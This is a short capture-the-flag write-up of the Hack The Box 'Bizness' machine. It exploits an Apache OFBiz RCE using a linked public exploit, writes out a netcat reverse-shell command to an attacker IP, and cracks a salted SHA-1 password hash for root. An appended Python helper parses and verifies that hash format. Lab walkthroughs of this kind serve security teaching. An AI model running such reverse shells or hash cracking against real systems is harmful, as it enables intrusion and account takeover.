BIZNESS HTB WRITE UP
We start with an nmap scan of the machine. Only port 22 and port 80 appear to be open, so the vulnerability that lets us into the machine is probably on the website. After browsing the website for a while, we see that it is developed with “Apache OFBiz.”
“Apache OFBiz” is a vulnerable application with an RCE (Remote Code Execution) vulnerability. Code for it is available here:
https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
We simply download the code from this repository and use it to run the command “nc -e /bin/sh 10.10.16.42 4242”, which gives us a reverse shell. Then we obtain our first flag.

While exploring the files for a way to gain root privileges, I came across a SHA-1 hash that looks like this:

Let’s first convert the hash to an appropriate format for cracking.

Then we’ll run the following hashcat command. While running it, let’s not forget the “:d” expression at the end.

Now that we know the password, we simply run the “su” command, enter the password, and gain root privileges. Then, we obtain the final flag, the root flag.
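
The format conversion step described above, as an added example that is not from the original write-up. It assumes the stored value has the layout $SHA$<salt>$<URL-safe base64 of SHA-1(salt + password)>, which is consistent with the “:d” salt suffix mentioned above; the function names are hypothetical and the sample is constructed, not the hash from the box.

```python
import base64
import hashlib
import hmac


def parse_salted_hash(stored):
    """Split '$SHA$<salt>$<base64url digest>' into (algorithm, salt, digest bytes)."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "" or parts[1] != "SHA":
        raise ValueError("not a $SHA$salt$digest string")
    _, algo, salt, b64 = parts
    # The assumed layout stores URL-safe base64 without '=' padding; restore it.
    digest = base64.urlsafe_b64decode(b64 + "=" * (-len(b64) % 4))
    if len(digest) != hashlib.sha1().digest_size:
        raise ValueError("digest is not 20 bytes, so not SHA-1")
    return algo, salt, digest


def to_hex_salt(stored):
    """Return '<40 hex chars>:<salt>', the hash:salt layout with the salt at the end."""
    _, salt, digest = parse_salted_hash(stored)
    return f"{digest.hex()}:{salt}"


def verify(stored, candidate):
    """Check one candidate password: a single SHA-1 over salt + password."""
    _, salt, digest = parse_salted_hash(stored)
    computed = hashlib.sha1(salt.encode() + candidate.encode()).digest()
    return hmac.compare_digest(computed, digest)


def make_sample(salt, password):
    """Build a constructed sample in the assumed layout (not a value from the box)."""
    digest = hashlib.sha1(salt.encode() + password.encode()).digest()
    encoded = base64.urlsafe_b64encode(digest).decode().rstrip("=")
    return "$SHA$" + salt + "$" + encoded


if __name__ == "__main__":
    sample = make_sample("d", "constructed-example-password")
    print(sample)               # stored form
    print(to_hex_salt(sample))  # hex digest followed by ':d'
    print(verify(sample, "constructed-example-password"))
```

Because checking a guess costs one SHA-1 call, this storage scheme gives little resistance to offline guessing once the hash leaks; a slow password hash such as bcrypt or Argon2 is the usual fix.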
